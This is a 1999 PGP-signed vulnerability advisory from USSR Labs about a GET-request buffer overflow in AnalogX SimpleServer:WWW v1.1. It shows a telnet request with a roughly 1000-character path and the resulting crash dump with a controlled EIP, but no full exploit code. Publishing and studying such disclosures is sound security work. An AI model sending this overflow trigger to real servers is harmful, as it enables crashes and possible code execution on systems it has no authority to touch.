analogx.www.txt

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
  
Happy New Year! to All!!  
  
  
Local / Remote GET Buffer Overflow Vulnerability in AnalogX  
SimpleServer:WWW HTTP Server v1.1  
  
USSR Advisory Code: USSR-99029  
  
Release Date:  
December 31, 1999 [5/5] (not the original one), original [5/5] will  
be released 15/01/1900 :)  
  
Systems Affected:  
AnalogX SimpleServer:WWW HTTP Server v1.1 for Win9x and possibly  
others versions.  
  
About The Software:  
Introducing AnalogX SimpleServer:WWW, the first in a series of simple  
to use yet  
powerful servers! This webserver is SO easy to use, about the only  
thing you need  
to know how to do is drag and drop files; then just click on the  
'Start' button, and  
you're webserver is up and running, serving your pages to the world!  
SimpleServer:WWW supports MIME file typing, CGI, common log format,  
and multi-hosting, just to name a few! If you've always wanted a  
compact,  
easy to use, versatile webserver, then you're prayers have been  
answered.  
  
THE PROBLEM  
  
UssrLabs found a Local / Remote Buffer overflow, The code that  
handles GET commands  
has an unchecked buffer that will allow arbitrary code to be executed  
if it is overflowed.  
  
Do you do the w00w00?  
This advisory also acts as part of w00giving. This is another  
contribution  
to w00giving for all you w00nderful people out there. You do know  
what  
w00giving is don't you? http://www.w00w00.org/advisories.html  
  
Example  
[hell@imahacker]$ telnet die.communitech.net 80  
Trying example.com...  
Connected to die.communitech.net  
Escape character is '^]'.  
GET (buffer) HTTP/1.1 <enter><enter>  
  
Where [buffer] is aprox. 1000 characters. At his point the server  
overflows.  
  
And in remote machine someone will be see something like this.  
  
HTTP caused an invalid page fault in  
module <unknown> at 0000:41414141.  
Registers:  
EAX=00afffbc CS=017f EIP=41414141 EFLGS=00010246  
EBX=00afffbc SS=0187 ESP=00af0060 EBP=00af0080  
ECX=00af0104 DS=0187 ESI=816294f0 FS=0e47  
EDX=bff76855 ES=0187 EDI=00af012c GS=0000  
Bytes at CS:EIP:  
  
Stack dump:  
bff76849 00af012c 00afffbc 00af0148 00af0104 00af0238 bff76855  
00afffbc 00af0114 bff87fe9 00af012c 00afffbc 00af0148 00af0104  
41414141 00af02f0  
  
Binary or source for this Exploit (wen we finish it):  
  
http://www.ussrback.com/  
  
Vendor Status:  
Informed.  
  
Vendor Url: http://www.analogx.com/  
Program Url:  
http://www.analogx.com/contents/download/network/sswww.htm  
  
Credit: USSRLABS  
  
SOLUTION  
Noting yet.  
  
Greetings:  
Eeye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN, Brock  
Tellier, Technotronic and  
Wiretrip.  
  
u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c  
h  
http://www.ussrback.com  
  
  
-----BEGIN PGP SIGNATURE-----  
Version: PGPfreeware 6.5.2 for non-commercial use <http://www.pgp.com>  
  
iQA/AwUBOGxnX9ybEYfHhkiVEQJfPgCghGxZoscsKViKd3Uh4bBBolTJMo4AoIXm  
3LuzCgF1g3827IQRfuP5qtZw  
=Nksc  
-----END PGP SIGNATURE-----  
  
  
`